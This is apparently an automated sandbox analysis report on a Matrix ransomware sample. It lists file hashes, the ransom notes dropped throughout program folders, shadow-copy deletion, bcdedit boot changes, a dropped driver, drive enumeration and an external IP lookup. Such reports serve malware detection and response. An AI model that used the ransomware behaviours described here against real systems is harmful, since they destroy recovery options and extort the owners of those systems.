Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
06-03-2022 05:30
Static task
static1
Behavioral task
behavioral1
Sample
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
Resource
win10v2004-en-20220112
General
-
Target
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
-
Size
2.6MB
-
MD5
99f0feb589d41c1465846e380d5cdc7d
-
SHA1
bae92119e9d856e735ed605d2db42680c2dabfc7
-
SHA256
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107
-
SHA512
d8a35f82f4e9d506db76da2ae6ce64b5cc19e28bf74353a07c750ce07547d43ac626d186f5a2f5572ac71d86f2d37868f5837f4b369b8c514c7497b771d8cfef
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office15\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_f4\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\Default\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\Admin\Searches\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 268 bcdedit.exe 3976 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 153 224 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS wkYsZhe164.exe -
Executes dropped EXE 3 IoCs
pid Process 1816 NWms5ZnU.exe 3540 wkYsZhe1.exe 2052 wkYsZhe164.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x00020000000216f4-150.dat upx behavioral2/files/0x00020000000216f4-151.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2232 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: wkYsZhe164.exe File opened (read-only) \??\Y: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\W: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\V: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\L: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\J: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\I: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\L: wkYsZhe164.exe File opened (read-only) \??\T: wkYsZhe164.exe File opened (read-only) \??\U: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\E: wkYsZhe164.exe File opened (read-only) \??\H: wkYsZhe164.exe File opened (read-only) \??\R: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\E: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\K: wkYsZhe164.exe File opened (read-only) \??\X: wkYsZhe164.exe File opened (read-only) \??\Z: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\X: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\S: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\N: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\G: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\Q: wkYsZhe164.exe File opened (read-only) \??\R: wkYsZhe164.exe File opened (read-only) \??\G: wkYsZhe164.exe File opened (read-only) \??\P: wkYsZhe164.exe File opened (read-only) \??\V: wkYsZhe164.exe File opened (read-only) \??\Z: wkYsZhe164.exe File opened (read-only) \??\T: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\K: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\M: wkYsZhe164.exe File opened (read-only) \??\U: wkYsZhe164.exe File opened (read-only) \??\P: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\O: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\M: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\F: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\F: wkYsZhe164.exe File opened (read-only) \??\S: wkYsZhe164.exe File opened (read-only) \??\Y: wkYsZhe164.exe File opened (read-only) \??\W: wkYsZhe164.exe File opened (read-only) \??\Q: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\H: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\A: wkYsZhe164.exe File opened (read-only) \??\B: wkYsZhe164.exe File opened (read-only) \??\I: wkYsZhe164.exe File opened (read-only) \??\J: wkYsZhe164.exe File opened (read-only) \??\O: wkYsZhe164.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 152 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\ByXMTJdC.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core.xml fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-io.xml fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_cancel_18.svg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ppd.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\ui-strings.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\flat_officeFontsPreview.ttf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-phn.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ppd.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\msjet.xsl fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Trial-pl.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.h fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\AppXManifest.xml fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ul-oob.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.tree.dat fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\System\VEN2232.OLB fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\ui-strings.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\info.png fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification 